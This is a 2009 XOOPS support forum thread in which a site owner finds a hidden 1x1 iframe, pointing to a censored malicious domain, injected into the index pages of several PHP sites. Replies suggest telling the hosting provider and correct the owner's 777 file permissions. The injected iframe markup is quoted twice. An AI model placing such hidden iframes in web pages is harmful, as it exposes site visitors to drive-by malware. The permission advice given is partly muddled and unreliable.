Re: my xoops sites hacked [Beginner's Corner] - XOOPS Web Application System

1

my xoops sites hacked

2009/4/18 20:18
MikeShane
Community Support Member
Posts: 144
Since: 2008/1/5 2

I have a couple of XOOPS sites on the same server and some of them get hacked with this

"
</html>
<iframe src="http://------.com/?click=ABCDEF" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
" it is on my front pages when i view source any help on how to get rid of them
how is the iframe on my page what would put it there

[EDIT by Mamba] I've edited the name of the hacker site, as we don't want Google searches associate our Website with them.

Musicians for musicians entertaining the world, what starts as a dream can live in reality!

2

Re: my xoops sites hacked

2009/4/18 23:57
ghia
Community Support Member
Posts: 4953
Since: 2008/7/3 1

You should warn your hoster about this. Other occurrences of this iframe insertion to indexfiles have turned out to be a server security problem as other sites on the same server were also affected, if they were XOOPS based or not.

The art of asking questions.

3

Re: my xoops sites hacked

2009/4/19 1:16
MikeShane
Community Support Member
Posts: 144
Since: 2008/1/5 2

thanks mamba did not think of that
I found that they were entries on my index.php pages three diferant sites (only php based sites) one was Joomla that I was testing with. I changed the pages and set permissions to 777
Now I will keep an eye on them though

Musicians for musicians entertaining the world, what starts as a dream can live in reality!

4

Re: my xoops sites hacked

2009/4/19 7:54
Mamba
Moderator
Posts: 11366
Since: 2004/4/23

Quote:

thanks mamba did not think of that

I think, you meant "Ghia" instead of me

Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

5

Re: my xoops sites hacked

2009/4/19 10:13
ghia
Community Support Member
Posts: 4953
Since: 2008/7/3 1

Quote:

I changed the pages and set permissions to 777

This is for giving also write permissions and is not correct!
Normal settings are 755 for PHP files and 644 for directories and html files. Mainfile.php should be 444 and some directories as listed in the release notes should have 777.

The art of asking questions.

6

Re: my xoops sites hacked

2009/4/19 19:46
MikeShane
Community Support Member
Posts: 144
Since: 2008/1/5 2

im back i thought i had it im wrong it is still there in my one site. How can I find out where it is coming from and how to get rid of it

<div id="content">
<iframe src="http://jerk@@.com/?click=1BFC45B" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
</div>
</td>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td valign="middle" align="center" class="bar"><div style="text-align: center; padding-top: 2px; font-size: 10px">Powered by myxoopssite 2001-2008 <a href="http://myxoopssite.net/" target="_blank">my XOOPS site</a></div></td>
</tr>
</table>
</body>
</html>

this is the code at the bottom of my page
any help?

Musicians for musicians entertaining the world, what starts as a dream can live in reality!

7

Re: my xoops sites hacked

2009/4/19 20:56
MikeShane
Community Support Member
Posts: 144
Since: 2008/1/5 2

I found out that they injected this code into every one of my index pages accociated with xoops. any idea how they did it or how to stopp it fgrom happening again

Musicians for musicians entertaining the world, what starts as a dream can live in reality!

Stats
Goal:	$100.00
Due Date:	May 31
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

my xoops sites hacked

Re: my xoops sites hacked

Re: my xoops sites hacked

Re: my xoops sites hacked

Re: my xoops sites hacked

Re: my xoops sites hacked

Re: my xoops sites hacked

Login

Search

Recent Posts

Re: Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Re: NewBB v 5.1.0 b 6

Re: NewBB v 5.1.0 b 6

NewBB v 5.1.0 b 6

Re: XOOPS 2.5.11 search user is not working

Re: oledrion

Re: oledrion

Re: oledrion

Re: oledrion

Who's Online

Donat-O-Meter

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}